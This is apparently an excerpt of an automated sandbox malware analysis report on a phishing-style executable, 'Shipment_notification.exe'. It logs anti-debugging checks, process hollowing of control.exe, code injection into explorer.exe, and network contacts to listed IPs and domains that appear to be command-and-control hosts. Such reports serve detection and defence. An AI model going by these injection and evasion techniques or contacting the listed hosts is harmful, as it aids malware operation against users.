          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040CEE3 LdrLoadDll,
          Source: C:\Users\user\Desktop\Shipment_notification.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 206.54.190.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.218.155.8 80
          Source: C:\Windows\explorer.exeDomain query: www.tcatelier.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.114.105.2 80
          Source: C:\Windows\explorer.exeDomain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exeDomain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exeDomain query: www.peramid.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80
          Source: C:\Windows\explorer.exeDomain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exeDomain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.27.134.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.158 80
          Source: C:\Windows\explorer.exeDomain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.drkathleensanders.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 880000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Shipment_notification.exeMemory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread register set: target process: 3324
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3324
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: explorer.exe, 00000003.00000000.353184774.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536066000.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.562430568.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.577680371.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.339413260.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Users\user\Desktop\Shipment_notification.exe VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
